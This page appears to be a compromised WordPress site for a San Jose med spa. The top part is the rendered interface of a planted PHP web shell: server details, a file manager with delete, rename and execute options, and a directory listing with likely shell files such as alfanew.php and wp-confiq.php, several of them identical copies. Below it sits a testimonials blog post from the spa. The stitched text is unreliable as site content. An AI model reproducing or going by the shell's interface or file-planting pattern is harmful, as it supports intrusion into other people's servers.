Uname: Linux nc-ph-3845.collidedigital.website 5.14.0-427.18.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 28 06:27:02 EDT 2024 x86_64
User: 1004 (blucocoonmedspa)
Group: 1005 (blucocoonmedspa)
Disable functions: yoxdu :)
Safe mode: On[ PHPinfo ]
//home/blucocoonmedspa/public_html      ( Reset | Go to )
sFaylSizeTarixOwner/GroupPermissionsActions
[ . ] 18 Jun 2024, 17:40 1004 0750
[ .. ] 11 Jun 2024, 21:06 1004 0711
[ .tmb ] 01 Jun 2024, 06:23 1004 0777 Zip | Sil
[ .well-known ] 01 Jun 2024, 06:23 1004 0755 Zip | Sil
[ .wp-cli ] 01 Jun 2024, 06:23 1004 0755 Zip | Sil
[ wordpress ] 15 Jun 2024, 08:04 1004 0755 Zip | Sil
[ wp-admin ] 15 Jun 2024, 08:04 1004 0755 Zip | Sil
[ wp-content ] 15 Jun 2024, 08:04 1004 0755 Zip | Sil
[ wp-includes ] 15 Jun 2024, 08:04 1004 0755 Zip | Sil
[ wp-ver ] 15 Jun 2024, 08:04 1004 0755 Zip | Sil
.htaccess 885 b 15 Jun 2024, 08:04 1004 0644 Download | Rename | Truncate | Delete
about.php 4.13 Kb 13 Jun 2024, 03:06 1004 0644 Download | Rename | Truncate | Delete
admin.php 44.26 Kb 11 Jun 2024, 03:32 1004 0644 Download | Rename | Truncate | Delete
alfanew.php 18.29 Kb 18 Jun 2024, 01:04 1004 0644 Download | Rename | Truncate | Delete
checkbex.php 55.63 Kb 15 Jun 2024, 08:04 1004 0644 Download | Rename | Truncate | Delete
goods.php 4.37 Kb 16 Jun 2024, 15:30 1004 0644 Download | Rename | Truncate | Delete
index.php 9.16 Kb 18 Jun 2024, 17:40 1004 0444 Download | Rename | Truncate | Delete
index.php0 404 b 01 Jun 2024, 06:23 1004 0777 Download | Rename | Truncate | Delete
index2.php 404 b 11 Jun 2024, 03:35 1004 0644 Download | Rename | Truncate | Delete
index6.php 420 b 15 Jun 2024, 08:04 1004 0644 Download | Rename | Truncate | Delete
license.txt 19.45 Kb 01 Jun 2024, 06:23 1004 0777 Download | Rename | Truncate | Delete
new.php 18.29 Kb 13 Jun 2024, 03:02 1004 0644 Download | Rename | Truncate | Delete
nowpf.php 18.29 Kb 16 Jun 2024, 14:44 1004 0644 Download | Rename | Truncate | Delete
pages.php 9.95 Kb 11 Jun 2024, 03:35 1004 0555 Download | Rename | Truncate | Delete
readme.html 7.23 Kb 11 Jun 2024, 03:35 1004 0644 Download | Rename | Truncate | Delete
robots.txt 243 b 15 Jun 2024, 08:04 1004 0644 Download | Rename | Truncate | Delete
shop.php 9.94 Kb 11 Jun 2024, 03:35 1004 0555 Download | Rename | Truncate | Delete
version.php 18.29 Kb 13 Jun 2024, 03:02 1004 0644 Download | Rename | Truncate | Delete
wp-activate.php 7.21 Kb 01 Jun 2024, 06:23 1004 0777 Download | Rename | Truncate | Delete
wp-admin.php 33.61 Kb 15 Jun 2024, 08:04 1004 0644 Download | Rename | Truncate | Delete
wp-blog-header.php 370 b 15 Jun 2024, 08:04 1004 0644 Download | Rename | Truncate | Delete
wp-checkbex.php 18.29 Kb 14 Jun 2024, 17:21 1004 0644 Download | Rename | Truncate | Delete
wp-comments-post.php 2.27 Kb 01 Jun 2024, 06:23 1004 0777 Download | Rename | Truncate | Delete
wp-config-sample.php 2.94 Kb 01 Jun 2024, 06:23 1004 0777 Download | Rename | Truncate | Delete
wp-config.php 3.05 Kb 01 Jun 2024, 06:23 1004 0777 Download | Rename | Truncate | Delete
wp-confiq.php 50.18 Kb 15 Jun 2024, 06:03 1004 0644 Download | Rename | Truncate | Delete
wp-cron.php 5.51 Kb 15 Jun 2024, 08:04 1004 0644 Download | Rename | Truncate | Delete
wp-info.php 7.96 Kb 15 Jun 2024, 08:04 1004 0644 Download | Rename | Truncate | Delete
wp-links-opml.php 2.44 Kb 01 Jun 2024, 06:23 1004 0644 Download | Rename | Truncate | Delete
wp-load.php 3.83 Kb 01 Jun 2024, 06:23 1004 0644 Download | Rename | Truncate | Delete
wp-mail.php 8.33 Kb 01 Jun 2024, 06:23 1004 0644 Download | Rename | Truncate | Delete
wp-settings.php 27.76 Kb 01 Jun 2024, 06:23 1004 0644 Download | Rename | Truncate | Delete
wp-signup.php 33.58 Kb 01 Jun 2024, 06:23 1004 0644 Download | Rename | Truncate | Delete
wp-term.php 2.87 Kb 15 Jun 2024, 08:04 1004 0644 Download | Rename | Truncate | Delete
wp-trackback.php 4.77 Kb 01 Jun 2024, 06:23 1004 0644 Download | Rename | Truncate | Delete
wp-ver.php 1.44 Kb 15 Jun 2024, 08:04 1004 0644 Download | Rename | Truncate | Delete
xmlrpc.php 3.17 Kb 01 Jun 2024, 06:23 1004 0644 Download | Rename | Truncate | Delete

Yeni fayl | Yeni papka
Icra edin
SQL
Blu Cocoon MedSpa Reviews: From the Mouths of Blu Cocoon Babes – Blu Cocoon Medspa
Blog

Blu Cocoon MedSpa Reviews: From the Mouths of Blu Cocoon Babes

Hot off the press!

We’ve updated the Blu Cocoon Testimonials page and they speak for themselves!

For those of you who are trying to get your mother, brother, sister, spouse, cousin, or friend to come see us (and we Thank You for the referral!) send them this page – there are reviews of Blu Cocoon‘s med spa services and staff.

Some examples:

Botox at Blu Cocoon review:

“My experience at (Blu) Cocoon was better than when I had my Botox done by a plastic surgeon. My nurse took her time, marks where the injections were to go, and consulted with the nurse practitioner. They even schedule you for a follow up appointment two weeks later.”– Jerri G.

Blu Cocoon Classic Facial review:

“I had never had a Facial in the 28 years i have been on this planet. Jamie was so awesome and thorough. The whole spa is a hands-down four-star spa. I am addicted now! My skin feels brand-new.”– Stephanie F.

About Blu Cocoon’s Customer Service:

“Today was my first session, but I have already recommended Blu Cocoon to friends. Customer service is STELLAR here and that’s the number one reason why I will continue to come back and refer future patrons. Second to customer service, the staff is beyond friendly and are very educated in the different areas of treatment that this spa offers.” – Anonymous

Laser Hair Reduction Review:

“Thank you for a wonderful and easygoing experience. I was nervous about doing laser hair removal for the first time, but it was quick and painless! I am looking forward to future treatments and I can hardly wait for the results.”– Anonymous

Customer satisfaction is a top priority at Blu Cocoon MedSpa in San Jose. We want your feedback! Email it to Blu Cocoon’s Spa Director Kelly Wetzel at kwetzel@blucocoonmedspa.com.

Get Product Sample & Free Consultation With Our Experts